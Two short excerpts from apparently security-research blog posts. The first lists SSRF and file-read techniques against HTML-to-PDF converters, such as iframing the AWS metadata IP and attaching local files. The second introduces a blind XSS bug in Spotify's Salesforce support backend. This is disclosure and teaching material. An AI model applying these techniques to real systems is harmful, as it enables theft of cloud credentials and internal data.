Mohammed Diaa

Intro You’ve probably already heard about many different ways to exploit HTML-to-PDF converters and access sensitive info: you can try to <iframe> AWS’s 169.254.169.254 IP and read that sweet, sweet metadata. Didn’t work? Inject a <script> tag and use JavaScript. Filtered, too? Maybe try a <link> with a rel="attachment" property and attach a sensitive file to the PDF. No? At least use an <img> to send GET requests to internal hosts or fingerprint them using their favicons?...

This is the story of a blind XSS vulnerability that affected Spotify. It could have allowed an attacker to gain access to their customer support backend, which is built on Salesforce. First, some background. What is a “blind XSS vulnerability”? Blind XSS is a type of persistent XSS that occurs when the attacker can’t see where their payload has fired. That is when a user’s unsanitized input is displayed on a page that is only accessible to users who have specific privileges, such as feedback, contact, and logging dashboards....